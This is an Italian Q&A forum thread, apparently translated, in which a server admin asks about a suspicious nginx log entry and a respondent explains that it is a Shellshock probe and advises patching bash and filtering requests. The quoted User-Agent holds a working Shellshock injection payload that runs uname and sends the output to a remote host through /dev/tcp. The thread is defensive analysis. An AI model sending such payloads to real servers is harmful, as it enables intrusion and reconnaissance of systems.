Capire una richiesta HTTP sospetta

2

Durante il debug del mio server per problemi, ho controllato spesso i miei log. Ecco uno strano che ho trovato, che sembra un tentativo di eseguire qualcosa sul mio server. Sto usando nginx su Ubuntu 14.04. Di seguito è riportata la voce del registro:

xxx.xxx.xxx.xxx - - [07/Apr/2015:02:15:05 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 400 172 "-" "() { :;}; echo; /bin/uname -a > /dev/tcp/xxx.xxx.xxx.xxx/80"

La richiesta di percorso di /cgi-bin/test.sh e il campo agente utente () { :;}; echo; /bin/uname -a > /dev/tcp/xxx.xxx.xxx.xxx/80 mi sembrano molto sospetti.

La mia ipotesi su questo è di eseguire qualcosa sul server (che per fortuna non è lì), e cercando di convincermi ad esporre le mie informazioni di sistema e inviarlo tramite TCP all'indirizzo IP del richiedente, (che, anche per mia fortuna, non ho ancora nulla che analizzi i log).

  1. Che cosa sta cercando di fare quella richiesta, sia nel percorso che nel campo User-agent?
  2. Ha fatto del male al server?
  3. Che cosa posso fare per ridurre il danno fatto?

Grazie in anticipo.

    
posta Kung Pao Chicken 07.04.2015 - 02:50
fonte

1 risposta

3

Sembra che qualcuno stia sondando la tua macchina per vedere se sei vulnerabile alla vulnerabilità shellshock .

Sperano che il comando venga eseguito contro la shell e che la risposta verrà restituita a loro. In questo caso stanno cercando di vedere quale sistema stai correndo, probabilmente per aiutare a scegliere i prossimi attacchi se hanno successo.

Assicurati di avere la versione con patch di bash o di utilizzare trattino . Potresti anche voler implementare le regole del firewall o le regole proxy per filtrare le richieste che includono la spia dello shock della shell, in quanto si tratta probabilmente di IP dannosi.

    
risposta data 07.04.2015 - 03:00
fonte

Leggi altre domande sui tag